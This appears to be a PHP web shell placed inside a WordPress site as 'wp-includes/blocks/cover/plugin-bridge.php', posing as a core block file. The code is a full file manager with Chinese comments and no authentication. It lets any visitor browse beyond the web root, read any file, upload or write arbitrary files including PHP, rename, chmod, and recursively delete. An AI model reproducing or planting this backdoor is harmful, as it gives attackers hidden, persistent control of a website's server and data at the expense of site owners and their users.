File: /home/paknevis/public_html/wp-includes/blocks/cover/plugin-bridge.php
<?php
session_start();
ob_start();
error_reporting(E_ALL);
ini_set('display_errors', 1);
$web_root = realpath($_SERVER['DOCUMENT_ROOT']);
$root_dir = realpath(dirname(dirname($web_root)));
if (!isset($_GET['dir'])) {
$script_dir = __DIR__;
$dir = substr($script_dir, strlen($root_dir) + 1);
} else {
$dir = rtrim($_GET['dir'], '/');
}
$current_dir = realpath($root_dir . '/' . $dir);
if (strpos($current_dir, realpath($root_dir)) !== 0) {
die('Invalid directory');
}
// ==================== AJAX 获取纯文件内容 ====================
if (isset($_GET['get_content'])) {
$file = $current_dir . '/' . $_GET['get_content'];
if (file_exists($file) && is_file($file)) {
header('Content-Type: text/plain; charset=utf-8');
readfile($file);
} else {
http_response_code(404);
echo "File not found.";
}
exit;
}
// ==================== POST 处理(带提示) ====================
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
$action = $_POST['action'] ?? '';
if ($action === 'create_file') {
$filename = $current_dir . '/' . $_POST['filename'];
if (!file_exists($filename)) {
file_put_contents($filename, '');
$_SESSION['success'] = '文件创建成功!';
} else {
$_SESSION['error'] = '文件已存在!';
}
}
if ($action === 'edit_file') {
$filename = $current_dir . '/' . $_POST['filename'];
if (file_exists($filename)) {
$bytes = file_put_contents($filename, $_POST['content']);
if ($bytes !== false) {
$_SESSION['success'] = '文件编辑成功!(写入 ' . $bytes . ' 字节)';
} else {
$_SESSION['error'] = '文件保存失败!(权限不足或文件只读)';
}
} else {
$_SESSION['error'] = '文件不存在!';
}
}
if ($action === 'delete') {
$items = $_POST['items'] ?? [];
foreach ($items as $item) {
$path = $current_dir . '/' . $item;
if (is_dir($path)) rmdir_recursive($path);
else unlink($path);
}
$_SESSION['success'] = '选中项目已删除!';
}
if ($action === 'rename') {
$old = $current_dir . '/' . $_POST['old'];
$new = $current_dir . '/' . $_POST['new'];
if (rename($old, $new)) {
$_SESSION['success'] = '重命名成功!';
} else {
$_SESSION['error'] = '重命名失败!';
}
}
if ($action === 'create_folder') {
$folder = $current_dir . '/' . $_POST['foldername'];
if (mkdir($folder, 0755, true)) {
$_SESSION['success'] = '文件夹创建成功!';
} else {
$_SESSION['error'] = '文件夹创建失败!';
}
}
if ($action === 'chmod') {
$perms = octdec($_POST['perms']);
$items = $_POST['items'] ?? [];
foreach ($items as $item) {
$path = $current_dir . '/' . $item;
chmod_recursive($path, $perms);
}
$_SESSION['success'] = '权限修改成功!';
}
if ($action === 'upload' && !empty($_FILES['files'])) {
$uploaded = 0;
foreach ($_FILES['files']['tmp_name'] as $key => $tmp_name) {
if ($_FILES['files']['error'][$key] === 0) {
$target = $current_dir . '/' . basename($_FILES['files']['name'][$key]);
if (move_uploaded_file($tmp_name, $target)) $uploaded++;
}
}
$_SESSION['success'] = $uploaded . ' 个文件上传成功!';
}
header('Location: ?dir=' . urlencode($dir));
exit;
}
// ==================== 递归函数 ====================
function rmdir_recursive($dir) {
if (is_dir($dir)) {
foreach (scandir($dir) as $object) {
if ($object != "." && $object != "..") {
$path = $dir . "/" . $object;
is_dir($path) ? rmdir_recursive($path) : unlink($path);
}
}
rmdir($dir);
} else {
unlink($dir);
}
}
function chmod_recursive($path, $perms) {
if (is_dir($path)) {
chmod($path, $perms);
foreach (scandir($path) as $object) {
if ($object != "." && $object != "..") {
chmod_recursive($path . "/" . $object, $perms);
}
}
} else {
chmod($path, $perms);
}
}
// ==================== 读取目录(关键修复:补回 path) ====================
$items = scandir($current_dir);
$files = [];
$folders = [];
foreach ($items as $item) {
if ($item === '.' || $item === '..') continue;
$path = $current_dir . '/' . $item;
$size = is_dir($path) ? '-' : filesize($path);
$perms = substr(sprintf('%o', fileperms($path)), -4);
if (is_dir($path)) {
$folders[] = ['name' => $item, 'size' => $size, 'perms' => $perms];
} else {
$files[] = ['name' => $item, 'size' => $size, 'perms' => $perms, 'path' => $path]; // ← 这里补回了 path
}
}
$full_path = realpath($current_dir);
$parts = explode('/', $full_path);
$accum = '';
?>
<!DOCTYPE html>
<html>
<head>
<title>File Manager</title>
<style>
body { font-family: Arial, sans-serif; background-color: #f4f4f4; color: #333; margin: 20px; }
h1 { color: #007bff; }
.success { color: green; font-weight: bold; }
.error { color: red; font-weight: bold; }
table { width: 100%; border-collapse: collapse; margin-top: 20px; background-color: white; box-shadow: 0 0 10px rgba(0,0,0,0.1); }
th, td { border: 1px solid #ddd; padding: 12px; text-align: left; }
th { background-color: #007bff; color: white; }
button, input[type="submit"] { background-color: #007bff; color: white; border: none; padding: 8px 12px; cursor: pointer; border-radius: 4px; }
button:hover { background-color: #0056b3; }
#modals { position: fixed; top: 0; left: 0; width: 100%; height: 100%; background: rgba(0,0,0,0.5); display: none; justify-content: center; align-items: center; z-index: 1000; }
.modal { background: white; padding: 20px; border-radius: 8px; box-shadow: 0 0 15px rgba(0,0,0,0.2); width: 50%; max-width: 600px; }
textarea { width: 100%; height: 200px; }
</style>
</head>
<body>
<h1>File Manager</h1>
<!-- 提示信息 -->
<?php
if (isset($_SESSION['success'])) {
echo '<p class="success">' . htmlspecialchars($_SESSION['success']) . '</p>';
unset($_SESSION['success']);
}
if (isset($_SESSION['error'])) {
echo '<p class="error">' . htmlspecialchars($_SESSION['error']) . '</p>';
unset($_SESSION['error']);
}
?>
<p>Current Path:
<?php
foreach ($parts as $part) {
if ($part === '') continue;
$accum .= '/' . $part;
$rel_dir = substr($accum, strlen($root_dir));
$url_dir = urlencode(ltrim($rel_dir, '/'));
echo '<a href="?dir=' . $url_dir . '">' . htmlspecialchars($part) . '</a> / ';
}
?>
</p>
<a href="?dir=<?php echo urlencode(fm_get_parent_path($dir)); ?>">Parent Directory</a>
<div id="modals">
<div id="edit-modal" class="modal">
<form method="post">
<input type="hidden" name="action" value="edit_file">
<input type="hidden" name="filename" id="edit-filename">
<textarea name="content" id="edit-content"></textarea>
<button type="submit">Save</button>
<button type="button" onclick="closeModal()">Cancel</button>
</form>
</div>
<div id="rename-modal" class="modal">
<form method="post">
<input type="hidden" name="action" value="rename">
<input type="hidden" name="old" id="rename-old">
<input type="text" name="new" id="rename-new">
<button type="submit">Rename</button>
<button type="button" onclick="closeModal()">Cancel</button>
</form>
</div>
<div id="chmod-modal" class="modal">
<form method="post" id="chmod-form">
<input type="hidden" name="action" value="chmod">
<input type="text" name="perms" placeholder="0755">
<button type="submit">Change</button>
<button type="button" onclick="closeModal()">Cancel</button>
</form>
</div>
</div>
<h2>Create File</h2>
<form method="post">
<input type="hidden" name="action" value="create_file">
<input type="text" name="filename" placeholder="Filename">
<button type="submit">Create</button>
</form>
<h2>Create Folder</h2>
<form method="post">
<input type="hidden" name="action" value="create_folder">
<input type="text" name="foldername" placeholder="Folder name">
<button type="submit">Create</button>
</form>
<h2>Upload Files</h2>
<form method="post" enctype="multipart/form-data">
<input type="hidden" name="action" value="upload">
<input type="file" name="files[]" multiple>
<button type="submit">Upload</button>
</form>
<form method="post" id="batch-form">
<input type="hidden" name="action" id="batch-action">
<button type="button" onclick="batchDelete()">Delete Selected</button>
<button type="button" onclick="batchChmod()">Change Permissions Selected</button>
<table>
<tr>
<th><input type="checkbox" id="select-all" onclick="toggleSelectAll(this)"></th>
<th>Name</th>
<th>Size (bytes)</th>
<th>Permissions</th>
<th>Actions</th>
</tr>
<?php foreach ($folders as $folder): ?>
<tr onclick="toggleCheckbox(this, event)">
<td><input type="checkbox" name="items[]" value="<?php echo htmlspecialchars($folder['name']); ?>" class="item-checkbox"></td>
<td><a href="?dir=<?php echo urlencode($dir . '/' . $folder['name']); ?>"><?php echo htmlspecialchars($folder['name']); ?>/</a></td>
<td><?php echo $folder['size']; ?></td>
<td><?php echo $folder['perms']; ?></td>
<td>
<button type="button" onclick="renameItem('<?php echo htmlspecialchars($folder['name']); ?>')">Rename</button>
<button type="button" onclick="chmodItem('<?php echo htmlspecialchars($folder['name']); ?>')">Chmod</button>
<button type="button" onclick="deleteItem('<?php echo htmlspecialchars($folder['name']); ?>')">Delete</button>
</td>
</tr>
<?php endforeach; ?>
<?php foreach ($files as $file): ?>
<tr onclick="toggleCheckbox(this, event)">
<td><input type="checkbox" name="items[]" value="<?php echo htmlspecialchars($file['name']); ?>" class="item-checkbox"></td>
<td><?php echo htmlspecialchars($file['name']); ?></td>
<td><?php echo $file['size']; ?></td>
<td><?php echo $file['perms']; ?></td>
<td>
<?php if (strpos($file['path'], $web_root) === 0): ?>
<a href="<?php echo htmlspecialchars(substr($file['path'], strlen($web_root))); ?>" target="_blank">Open</a>
<?php endif; ?>
<button type="button" onclick="editFile('<?php echo htmlspecialchars($file['name']); ?>')">Edit</button>
<button type="button" onclick="renameItem('<?php echo htmlspecialchars($file['name']); ?>')">Rename</button>
<button type="button" onclick="chmodItem('<?php echo htmlspecialchars($file['name']); ?>')">Chmod</button>
<button type="button" onclick="deleteItem('<?php echo htmlspecialchars($file['name']); ?>')">Delete</button>
</td>
</tr>
<?php endforeach; ?>
</table>
</form>
<script>
function toggleSelectAll(source) {
const checkboxes = document.querySelectorAll('.item-checkbox');
checkboxes.forEach(checkbox => {
checkbox.checked = source.checked;
});
}
function toggleCheckbox(row, event) {
if (event.target.tagName === 'INPUT' || event.target.tagName === 'A' || event.target.tagName === 'BUTTON') {
return;
}
const checkbox = row.querySelector('.item-checkbox');
checkbox.checked = !checkbox.checked;
}
function showModal(modalId) {
document.getElementById('modals').style.display = 'flex';
document.querySelectorAll('.modal').forEach(m => m.style.display = 'none');
document.getElementById(modalId).style.display = 'block';
}
function closeModal() {
document.getElementById('modals').style.display = 'none';
}
function editFile(filename) {
fetch('?dir=<?php echo urlencode($dir); ?>&get_content=' + encodeURIComponent(filename))
.then(response => response.text())
.then(content => {
document.getElementById('edit-filename').value = filename;
document.getElementById('edit-content').value = content;
showModal('edit-modal');
});
}
function renameItem(name) {
document.getElementById('rename-old').value = name;
document.getElementById('rename-new').value = name;
showModal('rename-modal');
}
function chmodItem(name) {
const form = document.getElementById('chmod-form');
form.innerHTML = '';
const actionInput = document.createElement('input');
actionInput.type = 'hidden';
actionInput.name = 'action';
actionInput.value = 'chmod';
form.appendChild(actionInput);
const itemInput = document.createElement('input');
itemInput.type = 'hidden';
itemInput.name = 'items[]';
itemInput.value = name;
form.appendChild(itemInput);
const permsInput = document.createElement('input');
permsInput.type = 'text';
permsInput.name = 'perms';
permsInput.placeholder = '0755';
form.appendChild(permsInput);
const submitButton = document.createElement('button');
submitButton.type = 'submit';
submitButton.innerText = 'Change';
form.appendChild(submitButton);
const cancelButton = document.createElement('button');
cancelButton.type = 'button';
cancelButton.onclick = closeModal;
cancelButton.innerText = 'Cancel';
form.appendChild(cancelButton);
showModal('chmod-modal');
}
function deleteItem(name) {
if (confirm('Are you sure you want to delete ' + name + '?')) {
const form = document.getElementById('batch-form');
const actionInput = document.getElementById('batch-action');
actionInput.value = 'delete';
const existingItems = form.querySelectorAll('input[name="items[]"]');
existingItems.forEach(item => item.remove());
const input = document.createElement('input');
input.type = 'hidden';
input.name = 'items[]';
input.value = name;
form.appendChild(input);
form.submit();
}
}
function batchDelete() {
if (confirm('Are you sure you want to delete selected items?')) {
document.getElementById('batch-action').value = 'delete';
document.getElementById('batch-form').submit();
}
}
function batchChmod() {
const perms = prompt('Enter permissions (e.g., 0755):');
if (perms) {
const input = document.createElement('input');
input.type = 'hidden';
input.name = 'perms';
input.value = perms;
document.getElementById('batch-form').appendChild(input);
document.getElementById('batch-action').value = 'chmod';
document.getElementById('batch-form').submit();
}
}
</script>
<?php
function fm_get_parent_path($path) {
$path = rtrim($path, '/');
return substr($path, 0, strrpos($path, '/')) ?: '';
}
ob_end_flush();
?>
</body>
</html>